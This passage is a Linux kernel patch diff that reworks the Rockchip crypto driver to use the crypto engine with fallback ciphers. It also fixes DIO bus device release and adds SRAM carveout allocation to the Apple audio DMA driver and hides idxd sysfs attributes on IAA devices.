+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_TDES_CHAINMODE_CBC;
++	rctx->mode = RK_CRYPTO_TDES_CHAINMODE_CBC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -146,9 +210,10 @@ static int rk_des_cbc_decrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_TDES_CHAINMODE_CBC | RK_CRYPTO_DEC;
++	rctx->mode = RK_CRYPTO_TDES_CHAINMODE_CBC | RK_CRYPTO_DEC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -156,9 +221,10 @@ static int rk_des3_ede_ecb_encrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_TDES_SELECT;
++	rctx->mode = RK_CRYPTO_TDES_SELECT;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -166,9 +232,10 @@ static int rk_des3_ede_ecb_decrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_TDES_SELECT | RK_CRYPTO_DEC;
++	rctx->mode = RK_CRYPTO_TDES_SELECT | RK_CRYPTO_DEC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -176,9 +243,10 @@ static int rk_des3_ede_cbc_encrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_TDES_SELECT | RK_CRYPTO_TDES_CHAINMODE_CBC;
++	rctx->mode = RK_CRYPTO_TDES_SELECT | RK_CRYPTO_TDES_CHAINMODE_CBC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -186,43 +254,42 @@ static int rk_des3_ede_cbc_decrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_TDES_SELECT | RK_CRYPTO_TDES_CHAINMODE_CBC |
++	rctx->mode = RK_CRYPTO_TDES_SELECT | RK_CRYPTO_TDES_CHAINMODE_CBC |
+ 		    RK_CRYPTO_DEC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+-static void rk_ablk_hw_init(struct rk_crypto_info *dev)
++static void rk_ablk_hw_init(struct rk_crypto_info *dev, struct skcipher_request *req)
+ {
+-	struct skcipher_request *req =
+-		skcipher_request_cast(dev->async_req);
+ 	struct crypto_skcipher *cipher = crypto_skcipher_reqtfm(req);
+ 	struct crypto_tfm *tfm = crypto_skcipher_tfm(cipher);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(cipher);
+-	u32 ivsize, block, conf_reg = 0;
++	u32 block, conf_reg = 0;
+ 
+ 	block = crypto_tfm_alg_blocksize(tfm);
+-	ivsize = crypto_skcipher_ivsize(cipher);
+ 
+ 	if (block == DES_BLOCK_SIZE) {
+-		ctx->mode |= RK_CRYPTO_TDES_FIFO_MODE |
++		rctx->mode |= RK_CRYPTO_TDES_FIFO_MODE |
+ 			     RK_CRYPTO_TDES_BYTESWAP_KEY |
+ 			     RK_CRYPTO_TDES_BYTESWAP_IV;
+-		CRYPTO_WRITE(dev, RK_CRYPTO_TDES_CTRL, ctx->mode);
+-		memcpy_toio(dev->reg + RK_CRYPTO_TDES_IV_0, req->iv, ivsize);
++		CRYPTO_WRITE(dev, RK_CRYPTO_TDES_CTRL, rctx->mode);
++		memcpy_toio(ctx->dev->reg + RK_CRYPTO_TDES_KEY1_0, ctx->key, ctx->keylen);
+ 		conf_reg = RK_CRYPTO_DESSEL;
+ 	} else {
+-		ctx->mode |= RK_CRYPTO_AES_FIFO_MODE |
++		rctx->mode |= RK_CRYPTO_AES_FIFO_MODE |
+ 			     RK_CRYPTO_AES_KEY_CHANGE |
+ 			     RK_CRYPTO_AES_BYTESWAP_KEY |
+ 			     RK_CRYPTO_AES_BYTESWAP_IV;
+ 		if (ctx->keylen == AES_KEYSIZE_192)
+-			ctx->mode |= RK_CRYPTO_AES_192BIT_key;
++			rctx->mode |= RK_CRYPTO_AES_192BIT_key;
+ 		else if (ctx->keylen == AES_KEYSIZE_256)
+-			ctx->mode |= RK_CRYPTO_AES_256BIT_key;
+-		CRYPTO_WRITE(dev, RK_CRYPTO_AES_CTRL, ctx->mode);
+-		memcpy_toio(dev->reg + RK_CRYPTO_AES_IV_0, req->iv, ivsize);
++			rctx->mode |= RK_CRYPTO_AES_256BIT_key;
++		CRYPTO_WRITE(dev, RK_CRYPTO_AES_CTRL, rctx->mode);
++		memcpy_toio(ctx->dev->reg + RK_CRYPTO_AES_KEY_0, ctx->key, ctx->keylen);
+ 	}
+ 	conf_reg |= RK_CRYPTO_BYTESWAP_BTFIFO |
+ 		    RK_CRYPTO_BYTESWAP_BRFIFO;
+@@ -231,146 +298,138 @@ static void rk_ablk_hw_init(struct rk_crypto_info *dev)
+ 		     RK_CRYPTO_BCDMA_ERR_ENA | RK_CRYPTO_BCDMA_DONE_ENA);
+ }
+ 
+-static void crypto_dma_start(struct rk_crypto_info *dev)
++static void crypto_dma_start(struct rk_crypto_info *dev,
++			     struct scatterlist *sgs,
++			     struct scatterlist *sgd, unsigned int todo)
+ {
+-	CRYPTO_WRITE(dev, RK_CRYPTO_BRDMAS, dev->addr_in);
+-	CRYPTO_WRITE(dev, RK_CRYPTO_BRDMAL, dev->count / 4);
+-	CRYPTO_WRITE(dev, RK_CRYPTO_BTDMAS, dev->addr_out);
++	CRYPTO_WRITE(dev, RK_CRYPTO_BRDMAS, sg_dma_address(sgs));
++	CRYPTO_WRITE(dev, RK_CRYPTO_BRDMAL, todo);
++	CRYPTO_WRITE(dev, RK_CRYPTO_BTDMAS, sg_dma_address(sgd));
+ 	CRYPTO_WRITE(dev, RK_CRYPTO_CTRL, RK_CRYPTO_BLOCK_START |
+ 		     _SBF(RK_CRYPTO_BLOCK_START, 16));
+ }
+ 
+-static int rk_set_data_start(struct rk_crypto_info *dev)
++static int rk_cipher_run(struct crypto_engine *engine, void *async_req)
+ {
+-	int err;
+-	struct skcipher_request *req =
+-		skcipher_request_cast(dev->async_req);
+-	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
++	struct skcipher_request *areq = container_of(async_req, struct skcipher_request, base);
++	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(areq);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+-	u32 ivsize = crypto_skcipher_ivsize(tfm);
+-	u8 *src_last_blk = page_address(sg_page(dev->sg_src)) +
+-		dev->sg_src->offset + dev->sg_src->length - ivsize;
+-
+-	/* Store the iv that need to be updated in chain mode.
+-	 * And update the IV buffer to contain the next IV for decryption mode.
+-	 */
+-	if (ctx->mode & RK_CRYPTO_DEC) {
+-		memcpy(ctx->iv, src_last_blk, ivsize);
+-		sg_pcopy_to_buffer(dev->first, dev->src_nents, req->iv,
+-				   ivsize, dev->total - ivsize);
+-	}
+-
+-	err = dev->load_data(dev, dev->sg_src, dev->sg_dst);
+-	if (!err)
+-		crypto_dma_start(dev);
+-	return err;
+-}
+-
+-static int rk_ablk_start(struct rk_crypto_info *dev)
+-{
+-	struct skcipher_request *req =
+-		skcipher_request_cast(dev->async_req);
+-	unsigned long flags;
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(areq);
++	struct scatterlist *sgs, *sgd;
+ 	int err = 0;
++	int ivsize = crypto_skcipher_ivsize(tfm);
++	int offset;
++	u8 iv[AES_BLOCK_SIZE];
++	u8 biv[AES_BLOCK_SIZE];
++	u8 *ivtouse = areq->iv;
++	unsigned int len = areq->cryptlen;
++	unsigned int todo;
++
++	ivsize = crypto_skcipher_ivsize(tfm);
++	if (areq->iv && crypto_skcipher_ivsize(tfm) > 0) {
++		if (rctx->mode & RK_CRYPTO_DEC) {
++			offset = areq->cryptlen - ivsize;
++			scatterwalk_map_and_copy(rctx->backup_iv, areq->src,
++						 offset, ivsize, 0);
++		}
++	}
+ 
+-	dev->left_bytes = req->cryptlen;
+-	dev->total = req->cryptlen;
+-	dev->sg_src = req->src;
+-	dev->first = req->src;
+-	dev->src_nents = sg_nents(req->src);
+-	dev->sg_dst = req->dst;
+-	dev->dst_nents = sg_nents(req->dst);
+-	dev->aligned = 1;
+-
+-	spin_lock_irqsave(&dev->lock, flags);
+-	rk_ablk_hw_init(dev);
+-	err = rk_set_data_start(dev);
+-	spin_unlock_irqrestore(&dev->lock, flags);
+-	return err;
+-}
++	sgs = areq->src;
++	sgd = areq->dst;
+ 
+-static void rk_iv_copyback(struct rk_crypto_info *dev)
+-{
+-	struct skcipher_request *req =
+-		skcipher_request_cast(dev->async_req);
+-	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+-	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+-	u32 ivsize = crypto_skcipher_ivsize(tfm);
+-
+-	/* Update the IV buffer to contain the next IV for encryption mode. */
+-	if (!(ctx->mode & RK_CRYPTO_DEC)) {
+-		if (dev->aligned) {
+-			memcpy(req->iv, sg_virt(dev->sg_dst) +
+-				dev->sg_dst->length - ivsize, ivsize);
++	while (sgs && sgd && len) {
++		if (!sgs->length) {
++			sgs = sg_next(sgs);
++			sgd = sg_next(sgd);
++			continue;
++		}
++		if (rctx->mode & RK_CRYPTO_DEC) {
++			/* we backup last block of source to be used as IV at next step */
++			offset = sgs->length - ivsize;
++			scatterwalk_map_and_copy(biv, sgs, offset, ivsize, 0);
++		}
++		if (sgs == sgd) {
++			err = dma_map_sg(ctx->dev->dev, sgs, 1, DMA_BIDIRECTIONAL);
++			if (err <= 0) {
++				err = -EINVAL;
++				goto theend_iv;
++			}
++		} else {
++			err = dma_map_sg(ctx->dev->dev, sgs, 1, DMA_TO_DEVICE);
++			if (err <= 0) {
++				err = -EINVAL;
++				goto theend_iv;
++			}
++			err = dma_map_sg(ctx->dev->dev, sgd, 1, DMA_FROM_DEVICE);
++			if (err <= 0) {
++				err = -EINVAL;
++				goto theend_sgs;
++			}
++		}
++		err = 0;
++		rk_ablk_hw_init(ctx->dev, areq);
++		if (ivsize) {
++			if (ivsize == DES_BLOCK_SIZE)
++				memcpy_toio(ctx->dev->reg + RK_CRYPTO_TDES_IV_0, ivtouse, ivsize);
++			else
++				memcpy_toio(ctx->dev->reg + RK_CRYPTO_AES_IV_0, ivtouse, ivsize);
++		}
++		reinit_completion(&ctx->dev->complete);
++		ctx->dev->status = 0;
++
++		todo = min(sg_dma_len(sgs), len);
++		len -= todo;
++		crypto_dma_start(ctx->dev, sgs, sgd, todo / 4);
++		wait_for_completion_interruptible_timeout(&ctx->dev->complete,
++							  msecs_to_jiffies(2000));
++		if (!ctx->dev->status) {
++			dev_err(ctx->dev->dev, "DMA timeout\n");
++			err = -EFAULT;
++			goto theend;
++		}
++		if (sgs == sgd) {
++			dma_unmap_sg(ctx->dev->dev, sgs, 1, DMA_BIDIRECTIONAL);
++		} else {
++			dma_unmap_sg(ctx->dev->dev, sgs, 1, DMA_TO_DEVICE);
++			dma_unmap_sg(ctx->dev->dev, sgd, 1, DMA_FROM_DEVICE);
++		}
++		if (rctx->mode & RK_CRYPTO_DEC) {
++			memcpy(iv, biv, ivsize);
++			ivtouse = iv;
+ 		} else {
+-			memcpy(req->iv, dev->addr_vir +
+-				dev->count - ivsize, ivsize);
++			offset = sgd->length - ivsize;
++			scatterwalk_map_and_copy(iv, sgd, offset, ivsize, 0);
++			ivtouse = iv;
+ 		}
++		sgs = sg_next(sgs);
++		sgd = sg_next(sgd);
+ 	}
+-}
+-
+-static void rk_update_iv(struct rk_crypto_info *dev)
+-{
+-	struct skcipher_request *req =
+-		skcipher_request_cast(dev->async_req);
+-	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+-	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+-	u32 ivsize = crypto_skcipher_ivsize(tfm);
+-	u8 *new_iv = NULL;
+ 
+-	if (ctx->mode & RK_CRYPTO_DEC) {
+-		new_iv = ctx->iv;
+-	} else {
+-		new_iv = page_address(sg_page(dev->sg_dst)) +
+-			 dev->sg_dst->offset + dev->sg_dst->length - ivsize;
++	if (areq->iv && ivsize > 0) {
++		offset = areq->cryptlen - ivsize;
++		if (rctx->mode & RK_CRYPTO_DEC) {
++			memcpy(areq->iv, rctx->backup_iv, ivsize);
++			memzero_explicit(rctx->backup_iv, ivsize);
++		} else {
++			scatterwalk_map_and_copy(areq->iv, areq->dst, offset,
++						 ivsize, 0);
++		}
+ 	}
+ 
+-	if (ivsize == DES_BLOCK_SIZE)
+-		memcpy_toio(dev->reg + RK_CRYPTO_TDES_IV_0, new_iv, ivsize);
+-	else if (ivsize == AES_BLOCK_SIZE)
+-		memcpy_toio(dev->reg + RK_CRYPTO_AES_IV_0, new_iv, ivsize);
+-}
++theend:
++	local_bh_disable();
++	crypto_finalize_skcipher_request(engine, areq, err);
++	local_bh_enable();
++	return 0;
+ 
+-/* return:
+- *	true	some err was occurred
+- *	fault	no err, continue
+- */
+-static int rk_ablk_rx(struct rk_crypto_info *dev)
+-{
+-	int err = 0;
+-	struct skcipher_request *req =
+-		skcipher_request_cast(dev->async_req);
+-
+-	dev->unload_data(dev);
+-	if (!dev->aligned) {
+-		if (!sg_pcopy_from_buffer(req->dst, dev->dst_nents,
+-					  dev->addr_vir, dev->count,
+-					  dev->total - dev->left_bytes -
+-					  dev->count)) {
+-			err = -EINVAL;
+-			goto out_rx;
+-		}
+-	}
+-	if (dev->left_bytes) {
+-		rk_update_iv(dev);
+-		if (dev->aligned) {
+-			if (sg_is_last(dev->sg_src)) {
+-				dev_err(dev->dev, "[%s:%d] Lack of data\n",
+-					__func__, __LINE__);
+-				err = -ENOMEM;
+-				goto out_rx;
+-			}
+-			dev->sg_src = sg_next(dev->sg_src);
+-			dev->sg_dst = sg_next(dev->sg_dst);
+-		}
+-		err = rk_set_data_start(dev);
++theend_sgs:
++	if (sgs == sgd) {
++		dma_unmap_sg(ctx->dev->dev, sgs, 1, DMA_BIDIRECTIONAL);
+ 	} else {
+-		rk_iv_copyback(dev);
+-		/* here show the calculation is over without any err */
+-		dev->complete(dev->async_req, 0);
+-		tasklet_schedule(&dev->queue_task);
++		dma_unmap_sg(ctx->dev->dev, sgs, 1, DMA_TO_DEVICE);
++		dma_unmap_sg(ctx->dev->dev, sgd, 1, DMA_FROM_DEVICE);
+ 	}
+-out_rx:
++theend_iv:
+ 	return err;
+ }
+ 
+@@ -378,26 +437,34 @@ static int rk_ablk_init_tfm(struct crypto_skcipher *tfm)
+ {
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+ 	struct skcipher_alg *alg = crypto_skcipher_alg(tfm);
++	const char *name = crypto_tfm_alg_name(&tfm->base);
+ 	struct rk_crypto_tmp *algt;
+ 
+ 	algt = container_of(alg, struct rk_crypto_tmp, alg.skcipher);
+ 
+ 	ctx->dev = algt->dev;
+-	ctx->dev->align_size = crypto_tfm_alg_alignmask(crypto_skcipher_tfm(tfm)) + 1;
+-	ctx->dev->start = rk_ablk_start;
+-	ctx->dev->update = rk_ablk_rx;
+-	ctx->dev->complete = rk_crypto_complete;
+-	ctx->dev->addr_vir = (char *)__get_free_page(GFP_KERNEL);
+ 
+-	return ctx->dev->addr_vir ? ctx->dev->enable_clk(ctx->dev) : -ENOMEM;
++	ctx->fallback_tfm = crypto_alloc_skcipher(name, 0, CRYPTO_ALG_NEED_FALLBACK);
++	if (IS_ERR(ctx->fallback_tfm)) {
++		dev_err(ctx->dev->dev, "ERROR: Cannot allocate fallback for %s %ld\n",
++			name, PTR_ERR(ctx->fallback_tfm));
++		return PTR_ERR(ctx->fallback_tfm);
++	}
++
++	tfm->reqsize = sizeof(struct rk_cipher_rctx) +
++		crypto_skcipher_reqsize(ctx->fallback_tfm);
++
++	ctx->enginectx.op.do_one_request = rk_cipher_run;
++
++	return 0;
+ }
+ 
+ static void rk_ablk_exit_tfm(struct crypto_skcipher *tfm)
+ {
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+ 
+-	free_page((unsigned long)ctx->dev->addr_vir);
+-	ctx->dev->disable_clk(ctx->dev);
++	memzero_explicit(ctx->key, ctx->keylen);
++	crypto_free_skcipher(ctx->fallback_tfm);
+ }
+ 
+ struct rk_crypto_tmp rk_ecb_aes_alg = {
+@@ -406,7 +473,7 @@ struct rk_crypto_tmp rk_ecb_aes_alg = {
+ 		.base.cra_name		= "ecb(aes)",
+ 		.base.cra_driver_name	= "ecb-aes-rk",
+ 		.base.cra_priority	= 300,
+-		.base.cra_flags		= CRYPTO_ALG_ASYNC,
++		.base.cra_flags		= CRYPTO_ALG_ASYNC | CRYPTO_ALG_NEED_FALLBACK,
+ 		.base.cra_blocksize	= AES_BLOCK_SIZE,
+ 		.base.cra_ctxsize	= sizeof(struct rk_cipher_ctx),
+ 		.base.cra_alignmask	= 0x0f,
+@@ -428,7 +495,7 @@ struct rk_crypto_tmp rk_cbc_aes_alg = {
+ 		.base.cra_name		= "cbc(aes)",
+ 		.base.cra_driver_name	= "cbc-aes-rk",
+ 		.base.cra_priority	= 300,
+-		.base.cra_flags		= CRYPTO_ALG_ASYNC,
++		.base.cra_flags		= CRYPTO_ALG_ASYNC | CRYPTO_ALG_NEED_FALLBACK,
+ 		.base.cra_blocksize	= AES_BLOCK_SIZE,
+ 		.base.cra_ctxsize	= sizeof(struct rk_cipher_ctx),
+ 		.base.cra_alignmask	= 0x0f,
+@@ -451,7 +518,7 @@ struct rk_crypto_tmp rk_ecb_des_alg = {
+ 		.base.cra_name		= "ecb(des)",
+ 		.base.cra_driver_name	= "ecb-des-rk",
+ 		.base.cra_priority	= 300,
+-		.base.cra_flags		= CRYPTO_ALG_ASYNC,
++		.base.cra_flags		= CRYPTO_ALG_ASYNC | CRYPTO_ALG_NEED_FALLBACK,
+ 		.base.cra_blocksize	= DES_BLOCK_SIZE,
+ 		.base.cra_ctxsize	= sizeof(struct rk_cipher_ctx),
+ 		.base.cra_alignmask	= 0x07,
+@@ -473,7 +540,7 @@ struct rk_crypto_tmp rk_cbc_des_alg = {
+ 		.base.cra_name		= "cbc(des)",
+ 		.base.cra_driver_name	= "cbc-des-rk",
+ 		.base.cra_priority	= 300,
+-		.base.cra_flags		= CRYPTO_ALG_ASYNC,
++		.base.cra_flags		= CRYPTO_ALG_ASYNC | CRYPTO_ALG_NEED_FALLBACK,
+ 		.base.cra_blocksize	= DES_BLOCK_SIZE,
+ 		.base.cra_ctxsize	= sizeof(struct rk_cipher_ctx),
+ 		.base.cra_alignmask	= 0x07,
+@@ -496,7 +563,7 @@ struct rk_crypto_tmp rk_ecb_des3_ede_alg = {
+ 		.base.cra_name		= "ecb(des3_ede)",
+ 		.base.cra_driver_name	= "ecb-des3-ede-rk",
+ 		.base.cra_priority	= 300,
+-		.base.cra_flags		= CRYPTO_ALG_ASYNC,
++		.base.cra_flags		= CRYPTO_ALG_ASYNC | CRYPTO_ALG_NEED_FALLBACK,
+ 		.base.cra_blocksize	= DES_BLOCK_SIZE,
+ 		.base.cra_ctxsize	= sizeof(struct rk_cipher_ctx),
+ 		.base.cra_alignmask	= 0x07,
+@@ -518,7 +585,7 @@ struct rk_crypto_tmp rk_cbc_des3_ede_alg = {
+ 		.base.cra_name		= "cbc(des3_ede)",
+ 		.base.cra_driver_name	= "cbc-des3-ede-rk",
+ 		.base.cra_priority	= 300,
+-		.base.cra_flags		= CRYPTO_ALG_ASYNC,
++		.base.cra_flags		= CRYPTO_ALG_ASYNC | CRYPTO_ALG_NEED_FALLBACK,
+ 		.base.cra_blocksize	= DES_BLOCK_SIZE,
+ 		.base.cra_ctxsize	= sizeof(struct rk_cipher_ctx),
+ 		.base.cra_alignmask	= 0x07,
+diff --git a/drivers/dio/dio.c b/drivers/dio/dio.c
+index 0e5a5662d5a40..0a051d6568800 100644
+--- a/drivers/dio/dio.c
++++ b/drivers/dio/dio.c
+@@ -109,6 +109,12 @@ static char dio_no_name[] = { 0 };
+ 
+ #endif /* CONFIG_DIO_CONSTANTS */
+ 
++static void dio_dev_release(struct device *dev)
++{
++	struct dio_dev *ddev = container_of(dev, typeof(struct dio_dev), dev);
++	kfree(ddev);
++}
++
+ int __init dio_find(int deviceid)
+ {
+ 	/* Called to find a DIO device before the full bus scan has run.
+@@ -225,6 +231,7 @@ static int __init dio_init(void)
+ 		dev->bus = &dio_bus;
+ 		dev->dev.parent = &dio_bus.dev;
+ 		dev->dev.bus = &dio_bus_type;
++		dev->dev.release = dio_dev_release;
+ 		dev->scode = scode;
+ 		dev->resource.start = pa;
+ 		dev->resource.end = pa + DIO_SIZE(scode, va);
+@@ -252,6 +259,7 @@ static int __init dio_init(void)
+ 		if (error) {
+ 			pr_err("DIO: Error registering device %s\n",
+ 			       dev->name);
++			put_device(&dev->dev);
+ 			continue;
+ 		}
+ 		error = dio_create_sysfs_dev_files(dev);
+diff --git a/drivers/dma/apple-admac.c b/drivers/dma/apple-admac.c
+index a2cc520225d32..90f28bda29c8b 100644
+--- a/drivers/dma/apple-admac.c
++++ b/drivers/dma/apple-admac.c
+@@ -21,6 +21,12 @@
+ #define NCHANNELS_MAX	64
+ #define IRQ_NOUTPUTS	4
+ 
++/*
++ * For allocation purposes we split the cache
++ * memory into blocks of fixed size (given in bytes).
++ */
++#define SRAM_BLOCK	2048
++
+ #define RING_WRITE_SLOT		GENMASK(1, 0)
+ #define RING_READ_SLOT		GENMASK(5, 4)
+ #define RING_FULL		BIT(9)
+@@ -36,6 +42,9 @@
+ #define REG_TX_STOP		0x0004
+ #define REG_RX_START		0x0008
+ #define REG_RX_STOP		0x000c
++#define REG_IMPRINT		0x0090
++#define REG_TX_SRAM_SIZE	0x0094
++#define REG_RX_SRAM_SIZE	0x0098
+ 
+ #define REG_CHAN_CTL(ch)	(0x8000 + (ch) * 0x200)
+ #define REG_CHAN_CTL_RST_RINGS	BIT(0)
+@@ -53,7 +62,9 @@
+ #define BUS_WIDTH_FRAME_2_WORDS	0x10
+ #define BUS_WIDTH_FRAME_4_WORDS	0x20
+ 
+-#define CHAN_BUFSIZE		0x8000
++#define REG_CHAN_SRAM_CARVEOUT(ch)	(0x8050 + (ch) * 0x200)
++#define CHAN_SRAM_CARVEOUT_SIZE		GENMASK(31, 16)
++#define CHAN_SRAM_CARVEOUT_BASE		GENMASK(15, 0)
+ 
+ #define REG_CHAN_FIFOCTL(ch)	(0x8054 + (ch) * 0x200)
+ #define CHAN_FIFOCTL_LIMIT	GENMASK(31, 16)
+@@ -76,6 +87,8 @@ struct admac_chan {
+ 	struct dma_chan chan;
+ 	struct tasklet_struct tasklet;
+ 
++	u32 carveout;
++
+ 	spinlock_t lock;
+ 	struct admac_tx *current_tx;
+ 	int nperiod_acks;
+@@ -92,12 +105,24 @@ struct admac_chan {
+ 	struct list_head to_free;
+ };
+ 
++struct admac_sram {
++	u32 size;
++	/*
++	 * SRAM_CARVEOUT has 16-bit fields, so the SRAM cannot be larger than
++	 * 64K and a 32-bit bitfield over 2K blocks covers it.
++	 */
++	u32 allocated;
++};
++
+ struct admac_data {
+ 	struct dma_device dma;
+ 	struct device *dev;
+ 	__iomem void *base;
+ 	struct reset_control *rstc;
+ 
++	struct mutex cache_alloc_lock;
++	struct admac_sram txcache, rxcache;
++
+ 	int irq;
+ 	int irq_index;
+ 	int nchannels;
+@@ -118,6 +143,60 @@ struct admac_tx {
+ 	struct list_head node;
+ };
+ 
++static int admac_alloc_sram_carveout(struct admac_data *ad,
++				     enum dma_transfer_direction dir,
++				     u32 *out)
++{
++	struct admac_sram *sram;
++	int i, ret = 0, nblocks;
++
++	if (dir == DMA_MEM_TO_DEV)
++		sram = &ad->txcache;
++	else
++		sram = &ad->rxcache;
++
++	mutex_lock(&ad->cache_alloc_lock);
++
++	nblocks = sram->size / SRAM_BLOCK;
++	for (i = 0; i < nblocks; i++)
++		if (!(sram->allocated & BIT(i)))
++			break;
++
++	if (i < nblocks) {
++		*out = FIELD_PREP(CHAN_SRAM_CARVEOUT_BASE, i * SRAM_BLOCK) |
++			FIELD_PREP(CHAN_SRAM_CARVEOUT_SIZE, SRAM_BLOCK);
++		sram->allocated |= BIT(i);
++	} else {
++		ret = -EBUSY;
++	}
++
++	mutex_unlock(&ad->cache_alloc_lock);
++
++	return ret;
++}
++
++static void admac_free_sram_carveout(struct admac_data *ad,
++				     enum dma_transfer_direction dir,
++				     u32 carveout)
++{
++	struct admac_sram *sram;
++	u32 base = FIELD_GET(CHAN_SRAM_CARVEOUT_BASE, carveout);
++	int i;
++
++	if (dir == DMA_MEM_TO_DEV)
++		sram = &ad->txcache;
++	else
++		sram = &ad->rxcache;
++
++	if (WARN_ON(base >= sram->size))
++		return;
++
++	mutex_lock(&ad->cache_alloc_lock);
++	i = base / SRAM_BLOCK;
++	sram->allocated &= ~BIT(i);
++	mutex_unlock(&ad->cache_alloc_lock);
++}
++
+ static void admac_modify(struct admac_data *ad, int reg, u32 mask, u32 val)
+ {
+ 	void __iomem *addr = ad->base + reg;
+@@ -466,15 +545,28 @@ static void admac_synchronize(struct dma_chan *chan)
+ static int admac_alloc_chan_resources(struct dma_chan *chan)
+ {
+ 	struct admac_chan *adchan = to_admac_chan(chan);
++	struct admac_data *ad = adchan->host;
++	int ret;
+ 
+ 	dma_cookie_init(&adchan->chan);
++	ret = admac_alloc_sram_carveout(ad, admac_chan_direction(adchan->no),
++					&adchan->carveout);
++	if (ret < 0)
++		return ret;
++
++	writel_relaxed(adchan->carveout,
++		       ad->base + REG_CHAN_SRAM_CARVEOUT(adchan->no));
+ 	return 0;
+ }
+ 
+ static void admac_free_chan_resources(struct dma_chan *chan)
+ {
++	struct admac_chan *adchan = to_admac_chan(chan);
++
+ 	admac_terminate_all(chan);
+ 	admac_synchronize(chan);
++	admac_free_sram_carveout(adchan->host, admac_chan_direction(adchan->no),
++				 adchan->carveout);
+ }
+ 
+ static struct dma_chan *admac_dma_of_xlate(struct of_phandle_args *dma_spec,
+@@ -712,6 +804,7 @@ static int admac_probe(struct platform_device *pdev)
+ 	platform_set_drvdata(pdev, ad);
+ 	ad->dev = &pdev->dev;
+ 	ad->nchannels = nchannels;
++	mutex_init(&ad->cache_alloc_lock);
+ 
+ 	/*
+ 	 * The controller has 4 IRQ outputs. Try them all until
+@@ -801,6 +894,13 @@ static int admac_probe(struct platform_device *pdev)
+ 		goto free_irq;
+ 	}
+ 
++	ad->txcache.size = readl_relaxed(ad->base + REG_TX_SRAM_SIZE);
++	ad->rxcache.size = readl_relaxed(ad->base + REG_RX_SRAM_SIZE);
++
++	dev_info(&pdev->dev, "Audio DMA Controller\n");
++	dev_info(&pdev->dev, "imprint %x TX cache %u RX cache %u\n",
++		 readl_relaxed(ad->base + REG_IMPRINT), ad->txcache.size, ad->rxcache.size);
++
+ 	return 0;
+ 
+ free_irq:
+diff --git a/drivers/dma/idxd/sysfs.c b/drivers/dma/idxd/sysfs.c
+index 7269bd54554f6..3229dfc786507 100644
+--- a/drivers/dma/idxd/sysfs.c
++++ b/drivers/dma/idxd/sysfs.c
+@@ -528,6 +528,22 @@ static bool idxd_group_attr_progress_limit_invisible(struct attribute *attr,
+ 		!idxd->hw.group_cap.progress_limit;
+ }
+ 
++static bool idxd_group_attr_read_buffers_invisible(struct attribute *attr,
++						   struct idxd_device *idxd)
++{
++	/*
++	 * Intel IAA does not support Read Buffer allocation control,
++	 * make these attributes invisible.
++	 */
++	return (attr == &dev_attr_group_use_token_limit.attr ||
++		attr == &dev_attr_group_use_read_buffer_limit.attr ||
++		attr == &dev_attr_group_tokens_allowed.attr ||
++		attr == &dev_attr_group_read_buffers_allowed.attr ||
++		attr == &dev_attr_group_tokens_reserved.attr ||
++		attr == &dev_attr_group_read_buffers_reserved.attr) &&
++		idxd->data->type == IDXD_TYPE_IAX;
++}
++
+ static umode_t idxd_group_attr_visible(struct kobject *kobj,
+ 				       struct attribute *attr, int n)
+ {
+@@ -538,6 +554,9 @@ static umode_t idxd_group_attr_visible(struct kobject *kobj,
+ 	if (idxd_group_attr_progress_limit_invisible(attr, idxd))
+ 		return 0;
+ 
++	if (idxd_group_attr_read_buffers_invisible(attr, idxd))
++		return 0;
++
+ 	return attr->mode;
+ }
+ 
